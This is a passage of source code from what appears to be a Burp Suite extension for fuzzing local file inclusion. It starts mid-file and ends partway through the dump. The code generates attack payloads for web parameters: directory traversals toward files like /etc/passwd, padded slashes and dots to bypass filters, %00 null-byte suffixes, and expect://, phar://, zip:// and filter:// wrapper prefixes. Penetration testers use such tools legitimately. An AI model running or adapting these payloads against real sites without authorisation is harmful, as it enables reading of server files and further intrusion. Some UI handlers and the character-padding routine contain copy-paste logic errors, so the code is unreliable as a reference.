228 | nullByteRadioBoth.addActionListener(actionEvent -> {
229 | payloadGeneratorConfig.nullByteNo = true;
230 | payloadGeneratorConfig.nullByteYes = true;
231 | updatePayloadCardinality();
232 | });
233 |
234 | nullGroup.add(nullByteRadioNo);
235 | nullGroup.add(nullByteRadioYes);
236 | nullGroup.add(nullByteRadioBoth);
237 |
238 | nullRadioPanel.setLayout(new GridLayout(1, 2));
239 | nullRadioPanel.add(nullByteRadioNo);
240 | nullRadioPanel.add(nullByteRadioYes);
241 | nullRadioPanel.add(nullByteRadioBoth);
242 | }
243 |
244 | private void createComponentsSingleUrl(){
245 | urlEncodeLabel = new JLabel("URL encode:");
246 |
247 | JRadioButton urlEncodeRadioNo = new JRadioButton("No");
248 | JRadioButton urlEncodeRadioYes = new JRadioButton("Yes");
249 | JRadioButton urlEncodeRadioBoth = new JRadioButton("Try Both");
250 |
251 | urlEncodeRadioNo.addActionListener(actionEvent -> {
252 | payloadGeneratorConfig.nullByteNo = true;
253 | payloadGeneratorConfig.nullByteYes = false;
254 | updatePayloadCardinality();
255 | });
256 |
257 | urlEncodeRadioYes.addActionListener(actionEvent -> {
258 | payloadGeneratorConfig.urlEncodeNo = false;
259 | payloadGeneratorConfig.urlEncodeYes = true;
260 | updatePayloadCardinality();
261 | });
262 |
263 | urlEncodeRadioBoth.addActionListener(actionEvent -> {
264 | payloadGeneratorConfig.nullByteNo = true;
265 | payloadGeneratorConfig.nullByteYes = true;
266 | updatePayloadCardinality();
267 | });
268 |
269 | urlEncodeRadioNo.setSelected(true);
270 |
271 | ButtonGroup urlEncodeGroup = new ButtonGroup();
272 | urlEncodeGroup.add(urlEncodeRadioNo);
273 | urlEncodeGroup.add(urlEncodeRadioYes);
274 | urlEncodeGroup.add(urlEncodeRadioBoth);
275 |
276 | urlEncodeRadioPanel = new JPanel();
277 | urlEncodeRadioPanel.setLayout(new GridLayout(1, 2));
278 |
279 | urlEncodeRadioPanel.add(urlEncodeRadioNo);
280 | urlEncodeRadioPanel.add(urlEncodeRadioYes);
281 | urlEncodeRadioPanel.add(urlEncodeRadioBoth);
282 | }
283 |
284 | private void createComponentsDoubleUrl(){
285 | doubleUrlEncodeLabel = new JLabel("Double URL encode:");
286 | JRadioButton doubleUrlEncodeRadioNo = new JRadioButton("No");
287 | JRadioButton doubleUrlEncodeRadioYes = new JRadioButton("Yes");
288 | JRadioButton doubleUrlEncodeRadioBoth = new JRadioButton("Try Both");
289 |
290 | doubleUrlEncodeRadioNo.addActionListener(actionEvent -> {
291 | payloadGeneratorConfig.doubleUrlEncodeNo = true;
292 | payloadGeneratorConfig.doubleUrlEncodeYes = false;
293 | updatePayloadCardinality();
294 | });
295 |
296 | doubleUrlEncodeRadioYes.addActionListener(actionEvent -> {
297 | payloadGeneratorConfig.doubleUrlEncodeNo = false;
298 | payloadGeneratorConfig.doubleUrlEncodeYes = true;
299 | updatePayloadCardinality();
300 | });
301 |
302 | doubleUrlEncodeRadioBoth.addActionListener(actionEvent -> {
303 | payloadGeneratorConfig.doubleUrlEncodeNo = true;
304 | payloadGeneratorConfig.doubleUrlEncodeYes = true;
305 | updatePayloadCardinality();
306 | });
307 |
308 | doubleUrlEncodeRadioNo.setSelected(true);
309 | ButtonGroup doubleUrlEncodeGroup = new ButtonGroup();
310 |
311 | doubleUrlEncodeGroup.add(doubleUrlEncodeRadioNo);
312 | doubleUrlEncodeGroup.add(doubleUrlEncodeRadioYes);
313 | doubleUrlEncodeGroup.add(doubleUrlEncodeRadioBoth);
314 |
315 | doubleUrlEncodeRadioPanel = new JPanel();
316 | doubleUrlEncodeRadioPanel.setLayout(new GridLayout(1, 2));
317 | doubleUrlEncodeRadioPanel.add(doubleUrlEncodeRadioNo);
318 | doubleUrlEncodeRadioPanel.add(doubleUrlEncodeRadioYes);
319 | doubleUrlEncodeRadioPanel.add(doubleUrlEncodeRadioBoth);
320 | }
321 |
322 | private void createComponentsUtf(){
323 | utf8EncodeLabel = new JLabel("UTF-8 URL encode:");
324 | JRadioButton utf8EncodeRadioNo = new JRadioButton("No");
325 | JRadioButton utf8EncodeRadioYes = new JRadioButton("Yes");
326 | JRadioButton utf8EncodeRadioBoth = new JRadioButton("Try Both");
327 |
328 | utf8EncodeRadioNo.addActionListener(actionEvent -> {
329 | payloadGeneratorConfig.utf8EncodeNo = true;
330 | payloadGeneratorConfig.utf8EncodeYes = false;
331 | updatePayloadCardinality();
332 | });
333 |
334 | utf8EncodeRadioYes.addActionListener(actionEvent -> {
335 | payloadGeneratorConfig.utf8EncodeNo = false;
336 | payloadGeneratorConfig.utf8EncodeYes = true;
337 | updatePayloadCardinality();
338 | });
339 |
340 | utf8EncodeRadioBoth.addActionListener(actionEvent -> {
341 | payloadGeneratorConfig.utf8EncodeNo = true;
342 | payloadGeneratorConfig.utf8EncodeYes = true;
343 | updatePayloadCardinality();
344 | });
345 |
346 | utf8EncodeRadioNo.setSelected(true);
347 | ButtonGroup utf8EncodeRadioGroup = new ButtonGroup();
348 |
349 | utf8EncodeRadioGroup.add(utf8EncodeRadioNo);
350 | utf8EncodeRadioGroup.add(utf8EncodeRadioYes);
351 | utf8EncodeRadioGroup.add(utf8EncodeRadioBoth);
352 |
353 | utf8EncodeRadioPanel = new JPanel();
354 | utf8EncodeRadioPanel.setLayout(new GridLayout(1, 2));
355 | utf8EncodeRadioPanel.add(utf8EncodeRadioNo);
356 | utf8EncodeRadioPanel.add(utf8EncodeRadioYes);
357 | utf8EncodeRadioPanel.add(utf8EncodeRadioBoth);
358 | }
359 |
360 | private void createComponentsWrapper(){
361 | WrapperLabel = new JLabel("Wrappers:");
362 | filterCheckBoxPanel = new JPanel();
363 |
364 | expectWrapperCheckBox = new JCheckBox("Expect");
365 | filterWrapperCheckBox = new JCheckBox("Filter");
366 | pharWrapperCheckBox = new JCheckBox("Phar");
367 | zipWrapperCheckBox = new JCheckBox("Zip");
368 |
369 | expectWrapperCheckBox.addChangeListener(changeEvent -> updateConfig());
370 | filterWrapperCheckBox.addChangeListener(changeEvent -> updateConfig());
371 | pharWrapperCheckBox.addChangeListener(changeEvent -> updateConfig());
372 | zipWrapperCheckBox.addChangeListener(changeEvent -> updateConfig());
373 |
374 |
375 | filterCheckBoxPanel.add(expectWrapperCheckBox);
376 | filterCheckBoxPanel.add(filterWrapperCheckBox);
377 | filterCheckBoxPanel.add(pharWrapperCheckBox);
378 | filterCheckBoxPanel.add(zipWrapperCheckBox);
379 | }
380 |
381 | private void createComponentsSlashDirection(){
382 | slashLabel = new JLabel("Slash Directions:");
383 | String[] slashOptions = { "Forwards", "Backwards", "Both"};
384 | slashDirectionComboBox = new JComboBox<>(slashOptions);
385 | slashDirectionComboBox.addActionListener(actionEvent -> {
386 | String direction = (String) slashDirectionComboBox.getSelectedItem();
387 | if (direction != null && direction.equals("Forwards")) {
388 | payloadGeneratorConfig.forwardSlash = true;
389 | payloadGeneratorConfig.backwardsSlash = false;
390 | }
391 | else if (direction != null && direction.equals("Backwards")){
392 | payloadGeneratorConfig.forwardSlash = false;
393 | payloadGeneratorConfig.backwardsSlash = true;
394 | }
395 | else if (direction != null && direction.equals("Both")){
396 | payloadGeneratorConfig.forwardSlash = true;
397 | payloadGeneratorConfig.backwardsSlash = true;
398 | }
399 | updatePayloadCardinality();
400 | });
401 | }
402 |
403 | private void createComponentsPayload(){
404 | payloadCounterLabel = new JLabel();
405 | updatePayloadCardinality();
406 | }
407 |
408 | private void createComponentsGenerate(){
409 | generateBtn = new JButton("Generate Payloads");
410 | generateBtn.addActionListener(actionEvent -> updateConfig());
411 | }
412 |
413 | private void updateConfig(){
414 | // Files to include
415 | String[] files = includeFileTF.getText().split(",");
416 | Set filesSet = new HashSet<>(Arrays.asList(files));
417 | Set encodeSet = new HashSet<>();
418 | for(String f: filesSet){
419 | // Make sure that encoding is consistent
420 | encodeSet.add(new String(f.getBytes(), US_ASCII));
421 | }
422 | payloadGeneratorConfig.fileCount = encodeSet.size();
423 | payloadGeneratorConfig.filesToInclude = encodeSet;
424 | payloadGeneratorConfig.tranMax = tranMaxSlider.getValue();
425 | payloadGeneratorConfig.tranMin = tranMinSlider.getValue();
426 | payloadGeneratorConfig.slashMax = slashMaxSlider.getValue();
427 | payloadGeneratorConfig.slashMin = slashMinSlider.getValue();
428 | payloadGeneratorConfig.dotsMax = dotsMaxSlider.getValue();
429 | payloadGeneratorConfig.dotsMin = dotsMinSlider.getValue();
430 | payloadGeneratorConfig.expectWrapper = expectWrapperCheckBox.isSelected();
431 | payloadGeneratorConfig.filterWrapper = filterWrapperCheckBox.isSelected();
432 | payloadGeneratorConfig.pharWrapper = pharWrapperCheckBox.isSelected();
433 | payloadGeneratorConfig.zipWrapper = zipWrapperCheckBox.isSelected();
434 |
435 | updatePayloadCardinality();
436 | }
437 |
438 | private void updatePayloadCardinality(){
439 | try {
440 | int payloadCardinality = payloadGeneratorConfig.getPayloadCardinality();
441 | String formattedCardinality = NumberFormat.getNumberInstance(Locale.US).format(payloadCardinality);
442 | payloadCounterLabel.setText("Total Number Of Payloads per parameter: " + formattedCardinality);
443 | }catch (PayloadConfigException e){
444 | payloadCounterLabel.setText("Total Number Of Payloads per parameter: N/a");
445 | }
446 | }
447 |
448 | private void addComponents(){
449 |
450 | addJLabel(fileToIncludeLabel);
451 |
452 | int defaultValue = gbc.fill;
453 | gbc.fill = GridBagConstraints.HORIZONTAL;
454 | addInput(includeFileTF);
455 | gbc.fill = defaultValue;
456 |
457 | addJLabel(dirTransversalCountLabel);
458 | addInput(tranversalPanel);
459 |
460 | addJLabel(extraSlashesLabel);
461 | addInput(slashPanel);
462 |
463 | addJLabel(extraDotsLabel);
464 | addInput(dotPanel);
465 |
466 | addJLabel(nullByteInjectionLabel);
467 | addInput(nullRadioPanel);
468 |
469 | addJLabel(urlEncodeLabel);
470 | addInput(urlEncodeRadioPanel);
471 |
472 | addJLabel(doubleUrlEncodeLabel);
473 | addInput(doubleUrlEncodeRadioPanel);
474 |
475 | addJLabel(utf8EncodeLabel);
476 | addInput(utf8EncodeRadioPanel);
477 |
478 | addJLabel(WrapperLabel);
479 | addInput(filterCheckBoxPanel);
480 |
481 | addJLabel(slashLabel);
482 | addInput(slashDirectionComboBox);
483 |
484 | addJLabel(payloadCounterLabel);
485 | addInput(generateBtn);
486 | }
487 |
488 | private void addJLabel(JLabel label){
489 | gbc.gridx = 0;
490 | gbc.gridy ++;
491 | frame.add(label, gbc);
492 | }
493 |
494 | private void addInput(JComponent comp){
495 | gbc.gridx ++;
496 | frame.add(comp, gbc);
497 | }
498 | }
499 |
--------------------------------------------------------------------------------
/src/main/java/LfiFuzzer/payloadTypes/ExtraCharsPayloads.java:
--------------------------------------------------------------------------------
1 | package LfiFuzzer.payloadTypes;
2 |
3 | import LfiFuzzer.PayloadGeneratorConfig;
4 |
5 | import java.util.Set;
6 |
7 | /**
8 | * Adds some extra characters to try and bypass filter sanitation.
9 | */
10 | public class ExtraCharsPayloads extends PayloadType{
11 |
12 | private int charMin;
13 | private int charMax;
14 | private byte replaceChar;
15 |
16 | ExtraCharsPayloads(Set previousPayloads, PayloadGeneratorConfig config, String charType) {
17 | super(previousPayloads, config);
18 | if(charType.equals("slash")){
19 | charMin = config.slashMin;
20 | charMax = config.slashMax;
21 | replaceChar = getBytes(this.slashDirection)[0];
22 | }
23 | else{
24 | charMin = config.dotsMin;
25 | charMax = config.dotsMax;
26 | replaceChar = getBytes(".")[0];
27 | }
28 | }
29 |
30 | @Override
31 | public Set generatePayload(){
32 | for(byte [] currentPayload: previousPayloads) replaceCharactersForFile(currentPayload);
33 | return newPayloads;
34 | }
35 |
36 | private void replaceCharactersForFile(byte[] currentPayload){
37 | for(int x = charMin; x <= charMax; x++){
38 | newPayloads.add(replaceCharacters(x, currentPayload));
39 | }
40 | }
41 |
42 | private byte[] replaceCharacters(int numberOfCharacters, byte[] payload){
43 | if(numberOfCharacters < 2) return new byte[0];
44 |
45 | int currentSlashCount = getNumberOfReplaceableCharactersInPayload(payload);
46 | byte[] newPayload = new byte[payload.length + (currentSlashCount * numberOfCharacters)];
47 | int extra = 0;
48 |
49 | for(int x = 0; x < payload.length ; x++){
50 | if(payload[x] == replaceChar){
51 | for(int y=0; y <= numberOfCharacters -1; y++){
52 | newPayload[x + extra] = replaceChar;
53 | extra++;
54 | }
55 | }
56 | newPayload[x + extra] = payload[x];
57 | }
58 | concatByteArrays(payload, newPayload);
59 | return newPayload;
60 | }
61 |
62 | private int getNumberOfReplaceableCharactersInPayload(byte[] payload){
63 | int currentSlashCount = 0;
64 | byte characterByte = replaceChar;
65 |
66 | for (byte b : payload) if (characterByte == b) currentSlashCount++;
67 | return currentSlashCount;
68 | }
69 | }
70 |
--------------------------------------------------------------------------------
/src/main/java/LfiFuzzer/payloadTypes/NullBytePayloads.java:
--------------------------------------------------------------------------------
1 | package LfiFuzzer.payloadTypes;
2 |
3 | import LfiFuzzer.PayloadGeneratorConfig;
4 |
5 | import java.util.Set;
6 |
7 | /**
8 | * Append null bytes to payloads.
9 | */
10 | public class NullBytePayloads extends PayloadType{
11 |
12 | NullBytePayloads(Set previousPayloads, PayloadGeneratorConfig config) {
13 | super(previousPayloads, config);
14 | }
15 |
16 | @Override
17 | public Set generatePayload(){
18 | if(!config.nullByteYes) return newPayloads;
19 | if(previousPayloads.isEmpty()) previousPayloads.add(getBytes(""));
20 | for(byte[] oldPayload : previousPayloads){
21 | byte[] newPayload = concatByteArrays(oldPayload, getBytes("%00"));
22 | newPayloads.add(newPayload);
23 | }
24 | return newPayloads;
25 | }
26 | }
27 |
--------------------------------------------------------------------------------
/src/main/java/LfiFuzzer/payloadTypes/PayloadFactory.java:
--------------------------------------------------------------------------------
1 | package LfiFuzzer.payloadTypes;
2 |
3 | import LfiFuzzer.PayloadGeneratorConfig;
4 |
5 | import java.util.Set;
6 |
7 | public class PayloadFactory {
8 | public static PayloadType getPayloadType(String type, Set previousPayloads, PayloadGeneratorConfig config) throws PayloadNotFoundException{
9 | switch (type) {
10 | case "Transversal":
11 | return new TransversalPayloads(previousPayloads, config);
12 | case "Extra Slashes":
13 | return new ExtraCharsPayloads(previousPayloads, config, "slash");
14 | case "Extra Dots":
15 | return new ExtraCharsPayloads(previousPayloads, config, "dots");
16 | case "Nullbytes":
17 | return new NullBytePayloads(previousPayloads, config);
18 | case "Wrappers":
19 | return new WrapperPayloads(previousPayloads, config);
20 | }
21 | throw new PayloadNotFoundException("Failed to find payload type: " + type);
22 | }
23 | }
24 |
25 |
26 |
--------------------------------------------------------------------------------
/src/main/java/LfiFuzzer/payloadTypes/PayloadNotFoundException.java:
--------------------------------------------------------------------------------
1 | package LfiFuzzer.payloadTypes;
2 |
3 | public class PayloadNotFoundException extends RuntimeException{
4 | PayloadNotFoundException(String errorMessage) {
5 | super(errorMessage);
6 | }
7 | }
8 |
--------------------------------------------------------------------------------
/src/main/java/LfiFuzzer/payloadTypes/PayloadType.java:
--------------------------------------------------------------------------------
1 | package LfiFuzzer.payloadTypes;
2 |
3 | import LfiFuzzer.PayloadGeneratorConfig;
4 |
5 | import java.io.ByteArrayOutputStream;
6 | import java.io.IOException;
7 | import java.io.PrintWriter;
8 | import java.nio.charset.StandardCharsets;
9 | import java.util.Set;
10 |
11 | import static LfiFuzzer.TreeStructure.getTree;
12 |
13 | /**
14 | * Generic class that holds newly generated payloads for
15 | * a specific type.
16 | */
17 | public abstract class PayloadType {
18 | Set previousPayloads;
19 | Set newPayloads = getTree();
20 | PayloadGeneratorConfig config;
21 | String slashDirection;
22 |
23 | private PrintWriter stdout;
24 | private PrintWriter stderr;
25 |
26 | PayloadType(Set previousPayloads, PayloadGeneratorConfig config){
27 | this.previousPayloads = previousPayloads;
28 | this.config = config;
29 | this.slashDirection = findSlashDirection();
30 | }
31 |
32 | public Set generatePayload(){
33 | return newPayloads;
34 | }
35 |
36 | public void setStd(PrintWriter stdout, PrintWriter stderr){
37 | this.stdout = stdout;
38 | this.stderr = stderr;
39 | }
40 |
41 | byte[] concatByteArrays(byte[] a, byte[] b){
42 | ByteArrayOutputStream outputStream = new ByteArrayOutputStream( );
43 |
44 | try {
45 | outputStream.write( a );
46 | outputStream.write( b );
47 | return outputStream.toByteArray( );
48 | } catch (IOException e) {
49 | stderr.println(e.toString());
50 | }
51 | return new byte[0];
52 | }
53 |
54 | public void printPayloadBeforeAndAfter(byte[] before, byte[] after){
55 | String b = new String(before, StandardCharsets.UTF_8);
56 | String a = new String(after, StandardCharsets.UTF_8);
57 | stdout.println(b + " -> " + a);
58 | }
59 |
60 | public void printBytes(byte[] b){
61 | stdout.println(new String(b, StandardCharsets.UTF_8));
62 | }
63 |
64 | private String findSlashDirection(){
65 | if(config.forwardSlash) return "/";
66 | return "\\";
67 | }
68 |
69 | /**
70 | * Make sure we can decode a string in a consistent way
71 | */
72 | public static byte[] getBytes(String str){
73 | return str.getBytes(StandardCharsets.US_ASCII);
74 | }
75 |
76 | }
77 |
--------------------------------------------------------------------------------
/src/main/java/LfiFuzzer/payloadTypes/TransversalPayloads.java:
--------------------------------------------------------------------------------
1 | package LfiFuzzer.payloadTypes;
2 |
3 | import LfiFuzzer.PayloadGeneratorConfig;
4 | import java.util.Set;
5 | import static LfiFuzzer.TreeStructure.getTree;
6 |
7 | /**
8 | * Creates a set of byte arrays containing different directory transversals
9 | * ranging from config tranMin to config tranMax
10 | * for example /etc/passwd, ../etc/passwd, ../../etc/passwd
11 | */
12 | public class TransversalPayloads extends PayloadType{
13 | TransversalPayloads(Set previousPayloads, PayloadGeneratorConfig config) {
14 | super(previousPayloads, config);
15 | }
16 |
17 | @Override
18 | public Set generatePayload(){
19 | for(byte[] fileToInclude: this.previousPayloads){
20 | newPayloads.addAll(generatePayloadsForUniqFile(fileToInclude));
21 | }
22 | return newPayloads;
23 | }
24 |
25 | private Set generatePayloadsForUniqFile(byte[] fileToInclude){
26 | Set payloadsForFile = getTree();
27 | byte[] transversal = getBytes("..");
28 | byte[] transversalWithSlash = concatByteArrays(transversal, getBytes(this.slashDirection));
29 | byte[] currentPayload;
30 |
31 | for(int x = config.tranMin -1; x <= config.tranMax; x++){
32 | currentPayload = getBytes("");
33 | for(int y = 0; y <=x ; y++){
34 | if (y == x && checkIfFirstByteIsSlash(fileToInclude)){
35 | // Stop the first payload getting an extra slash
36 | currentPayload = concatByteArrays(currentPayload, transversal);
37 | }
38 | else currentPayload = concatByteArrays(currentPayload, transversalWithSlash);
39 | }
40 | payloadsForFile.add(concatByteArrays(currentPayload, fileToInclude));
41 | }
42 | return payloadsForFile;
43 | }
44 |
45 | private boolean checkIfFirstByteIsSlash(byte[] fileToInclude){
46 | return fileToInclude[0] == getBytes("/")[0] || fileToInclude[0] == getBytes("\\")[0];
47 | }
48 | }
49 |
--------------------------------------------------------------------------------
/src/main/java/LfiFuzzer/payloadTypes/WrapperPayloads.java:
--------------------------------------------------------------------------------
1 | package LfiFuzzer.payloadTypes;
2 |
3 | import LfiFuzzer.PayloadGeneratorConfig;
4 |
5 | import java.util.Set;
6 |
7 | public class WrapperPayloads extends PayloadType{
8 |
9 | private boolean enableExpect;
10 | private boolean enableFilter;
11 | private boolean enablePhar;
12 | private boolean enableZip;
13 |
14 | WrapperPayloads(Set previousPayloads, PayloadGeneratorConfig config) {
15 | super(previousPayloads, config);
16 |
17 | enableExpect = config.expectWrapper;
18 | enableFilter = config.filterWrapper;
19 | enablePhar = config.pharWrapper;
20 | enableZip = config.zipWrapper;
21 | }
22 |
23 | @Override
24 | public Set generatePayload(){
25 | if(enableExpect) generateExpectPayloads();
26 | if(enableFilter) generateFilterPayloads();
27 | if(enablePhar) generatePharPayloads();
28 | if(enableZip) generateZipPayloads();
29 | return newPayloads;
30 | }
31 |
32 | private void generateExpectPayloads(){
33 | /*
34 | Although these payloads might not execute a real command
35 | they could notify pentesters of strange behaviour that
36 | can be examined further.
37 | */
38 | for(byte[] currentPayload : previousPayloads){
39 | newPayloads.add(concatByteArrays(getBytes("expect://"), currentPayload));
40 | }
41 | }
42 |
43 | private void generateFilterPayloads(){
44 | for(byte[] currentPayload : previousPayloads){
45 | newPayloads.add(concatByteArrays(getBytes("filter://"), currentPayload));
46 | }
47 | }
48 |
49 | private void generatePharPayloads(){
50 | for(byte[] currentPayload : previousPayloads){
51 | newPayloads.add(concatByteArrays(getBytes("phar://"), currentPayload));
52 | }
53 | }
54 |
55 | private void generateZipPayloads(){
56 | for(byte[] currentPayload : previousPayloads){
57 | newPayloads.add(concatByteArrays(getBytes("zip://"), currentPayload));
58 | }
59 | }
60 |
61 | }
62 |
--------------------------------------------------------------------------------
/src/main/java/burp/BurpExtender.java:
--------------------------------------------------------------------------------
1 | package burp;
2 |
3 | import LfiFuzzer.PayloadGenerator;
4 | import LfiFuzzer.PayloadGeneratorConfig;
5 | import LfiFuzzer.UserInterface;
6 |
7 | import javax.swing.*;
8 | import java.io.PrintWriter;
9 | import java.util.Set;
10 |
11 |
12 | public class BurpExtender implements IBurpExtender, IIntruderPayloadGeneratorFactory
13 | {
14 | private IExtensionHelpers helpers;
15 | private PrintWriter stdout;
16 | private PrintWriter stderr;
17 | private UserInterface userInterface;
18 |
19 | //
20 | // implement IBurpExtender
21 | //
22 | @Override
23 | public void registerExtenderCallbacks(final IBurpExtenderCallbacks callbacks)
24 | {
25 | // obtain an extension helpers object
26 | helpers = callbacks.getHelpers();
27 | callbacks.setExtensionName("Local File Inclusion intruder payloads");
28 | callbacks.registerIntruderPayloadGeneratorFactory(this);
29 |
30 | stdout = new PrintWriter(callbacks.getStdout(), true);
31 | stderr = new PrintWriter(callbacks.getStderr(), true);
32 | stdout.println("Local File Inclusion Fuzzer plugin");
33 | stdout.println("---------------------------");
34 |
35 | userInterface = new UserInterface(callbacks);
36 | SwingUtilities.invokeLater(userInterface);
37 | }
38 |
39 | //
40 | // implement IIntruderPayloadGeneratorFactory
41 | //
42 |
43 | @Override
44 | public String getGeneratorName()
45 | {
46 | return "Local File Inclusion Fuzzer";
47 | }
48 |
49 | @Override
50 | public IIntruderPayloadGenerator createNewInstance(IIntruderAttack attack)
51 | {
52 | return new IntruderPayloadGenerator(userInterface.getPayloadConfiguration());
53 | }
54 |
55 |
56 | class IntruderPayloadGenerator implements IIntruderPayloadGenerator
57 | {
58 | int payloadIndex = 0;
59 | private byte[][] payloads;
60 |
61 | IntruderPayloadGenerator(PayloadGeneratorConfig config){
62 | generatePayloads(config);
63 | }
64 |
65 | void generatePayloads(PayloadGeneratorConfig config){
66 | PayloadGenerator generator = new PayloadGenerator(config, stdout, stderr, helpers);
67 | Set payloadsSet = generator.generatePayloads();
68 | int i = 0;
69 | payloads = new byte[payloadsSet.size()][];
70 | for(byte[] payload: payloadsSet) {
71 | payloads[i] = payload;
72 | i++;
73 | }
74 | }
75 |
76 | @Override
77 | public boolean hasMorePayloads()
78 | {
79 | return payloadIndex < payloads.length;
80 | }
81 |
82 | @Override
83 | public byte[] getNextPayload(byte[] baseValue)
84 | {
85 | byte[] payload = payloads[payloadIndex];
86 | payloadIndex++;
87 | return payload;
88 | }
89 |
90 | @Override
91 | public void reset()
92 | {
93 | payloadIndex = 0;
94 | }
95 | }
96 | }
--------------------------------------------------------------------------------
/src/main/java/burp/IBurpCollaboratorClientContext.java:
--------------------------------------------------------------------------------
1 | package burp;
2 |
3 | /*
4 | * @(#)IBurpCollaboratorClientContext.java
5 | *
6 | * Copyright PortSwigger Ltd. All rights reserved.
7 | *
8 | * This code may be used to extend the functionality of Burp Suite Community Edition
9 | * and Burp Suite Professional, provided that this usage does not violate the
10 | * license terms for those products.
11 | */
12 | import java.util.List;
13 |
14 | /**
15 | * This interface represents an instance of a Burp Collaborator client context,
16 | * which can be used to generate Burp Collaborator payloads and poll the
17 | * Collaborator server for any network interactions that result from using those
18 | * payloads. Extensions can obtain new instances of this class by calling
19 | * IBurpExtenderCallbacks.createBurpCollaboratorClientContext().
20 | * Note that each Burp Collaborator client context is tied to the Collaborator
21 | * server configuration that was in place at the time the context was created.
22 | */
23 | public interface IBurpCollaboratorClientContext
24 | {
25 |
26 | /**
27 | * This method is used to generate new Burp Collaborator payloads.
28 | *
29 | * @param includeCollaboratorServerLocation Specifies whether to include the
30 | * Collaborator server location in the generated payload.
31 | * @return The payload that was generated.
32 | *
33 | * @throws IllegalStateException if Burp Collaborator is disabled
34 | */
35 | String generatePayload(boolean includeCollaboratorServerLocation);
36 |
37 | /**
38 | * This method is used to retrieve all interactions received by the
39 | * Collaborator server resulting from payloads that were generated for this
40 | * context.
41 | *
42 | * @return The Collaborator interactions that have occurred resulting from
43 | * payloads that were generated for this context.
44 | *
45 | * @throws IllegalStateException if Burp Collaborator is disabled
46 | */
47 | List fetchAllCollaboratorInteractions();
48 |
49 | /**
50 | * This method is used to retrieve interactions received by the Collaborator
51 | * server resulting from a single payload that was generated for this
52 | * context.
53 | *
54 | * @param payload The payload for which interactions will be retrieved.
55 | * @return The Collaborator interactions that have occurred resulting from
56 | * the given payload.
57 | *
58 | * @throws IllegalStateException if Burp Collaborator is disabled
59 | */
60 | List fetchCollaboratorInteractionsFor(String payload);
61 |
62 | /**
63 | * This method is used to retrieve all interactions made by Burp Infiltrator
64 | * instrumentation resulting from payloads that were generated for this
65 | * context.
66 | *
67 | * @return The interactions triggered by the Burp Infiltrator
68 | * instrumentation that have occurred resulting from payloads that were
69 | * generated for this context.
70 | *
71 | * @throws IllegalStateException if Burp Collaborator is disabled
72 | */
73 | List fetchAllInfiltratorInteractions();
74 |
75 | /**
76 | * This method is used to retrieve interactions made by Burp Infiltrator
77 | * instrumentation resulting from a single payload that was generated for
78 | * this context.
79 | *
80 | * @param payload The payload for which interactions will be retrieved.
81 | * @return The interactions triggered by the Burp Infiltrator
82 | * instrumentation that have occurred resulting from the given payload.
83 | *
84 | * @throws IllegalStateException if Burp Collaborator is disabled
85 | */
86 | List fetchInfiltratorInteractionsFor(String payload);
87 |
88 | /**
89 | * This method is used to retrieve the network location of the Collaborator
90 | * server.
91 | *
92 | * @return The hostname or IP address of the Collaborator server.
93 | *
94 | * @throws IllegalStateException if Burp Collaborator is disabled
95 | */
96 | String getCollaboratorServerLocation();
97 | }
98 |
--------------------------------------------------------------------------------
/src/main/java/burp/IBurpCollaboratorInteraction.java:
--------------------------------------------------------------------------------
1 | package burp;
2 |
3 | /*
4 | * @(#)IBurpCollaboratorInteraction.java
5 | *
6 | * Copyright PortSwigger Ltd. All rights reserved.
7 | *
8 | * This code may be used to extend the functionality of Burp Suite Community Edition
9 | * and Burp Suite Professional, provided that this usage does not violate the
10 | * license terms for those products.
11 | */
12 | import java.util.Map;
13 |
14 | /**
15 | * This interface represents a network interaction that occurred with the Burp
16 | * Collaborator server.
17 | */
18 | public interface IBurpCollaboratorInteraction
19 | {
20 |
21 | /**
22 | * This method is used to retrieve a property of the interaction. Properties
23 | * of all interactions are: interaction_id, type, client_ip, and time_stamp.
24 | * Properties of DNS interactions are: query_type and raw_query. The
25 | * raw_query value is Base64-encoded. Properties of HTTP interactions are:
26 | * protocol, request, and response. The request and response values are
27 | * Base64-encoded.
28 | *
29 | * @param name The name of the property to retrieve.
30 | * @return A string representing the property value, or null if not present.
31 | */
32 | String getProperty(String name);
33 |
34 | /**
35 | * This method is used to retrieve a map containing all properties of the
36 | * interaction.
37 | *
38 | * @return A map containing all properties of the interaction.
39 | */
40 | Map getProperties();
41 | }
42 |
--------------------------------------------------------------------------------
/src/main/java/burp/IBurpExtender.java:
--------------------------------------------------------------------------------
1 | package burp;
2 |
3 | /*
4 | * @(#)IBurpExtender.java
5 | *
6 | * Copyright PortSwigger Ltd. All rights reserved.
7 | *
8 | * This code may be used to extend the functionality of Burp Suite Community Edition
9 | * and Burp Suite Professional, provided that this usage does not violate the
10 | * license terms for those products.
11 | */
12 | /**
13 | * All extensions must implement this interface.
14 | *
15 | * Implementations must be called BurpExtender, in the package burp, must be
16 | * declared public, and must provide a default (public, no-argument)
17 | * constructor.
18 | */
19 | public interface IBurpExtender
20 | {
21 | /**
22 | * This method is invoked when the extension is loaded. It registers an
23 | * instance of the
24 | * IBurpExtenderCallbacks interface, providing methods that may
25 | * be invoked by the extension to perform various actions.
26 | *
27 | * @param callbacks An
28 | * IBurpExtenderCallbacks object.
29 | */
30 | void registerExtenderCallbacks(IBurpExtenderCallbacks callbacks);
31 | }
32 |
--------------------------------------------------------------------------------
/src/main/java/burp/IContextMenuFactory.java:
--------------------------------------------------------------------------------
1 | package burp;
2 |
3 | /*
4 | * @(#)IContextMenuFactory.java
5 | *
6 | * Copyright PortSwigger Ltd. All rights reserved.
7 | *
8 | * This code may be used to extend the functionality of Burp Suite Community Edition
9 | * and Burp Suite Professional, provided that this usage does not violate the
10 | * license terms for those products.
11 | */
12 |
13 | import javax.swing.JMenuItem;
14 | import java.util.List;
15 |
16 | /**
17 | * Extensions can implement this interface and then call
18 | * IBurpExtenderCallbacks.registerContextMenuFactory() to register
19 | * a factory for custom context menu items.
20 | */
21 | public interface IContextMenuFactory
22 | {
23 | /**
24 | * This method will be called by Burp when the user invokes a context menu
25 | * anywhere within Burp. The factory can then provide any custom context
26 | * menu items that should be displayed in the context menu, based on the
27 | * details of the menu invocation.
28 | *
29 | * @param invocation An object that implements the
30 | * IContextMenuInvocation interface, which the extension can
31 | * query to obtain details of the context menu invocation.
32 | * @return A list of custom menu items (which may include sub-menus,
33 | * checkbox menu items, etc.) that should be displayed. Extensions may
34 | * return
35 | * null from this method, to indicate that no menu items are
36 | * required.
37 | */
38 | List createMenuItems(IContextMenuInvocation invocation);
39 | }
40 |
--------------------------------------------------------------------------------
/src/main/java/burp/IContextMenuInvocation.java:
--------------------------------------------------------------------------------
1 | package burp;
2 |
3 | /*
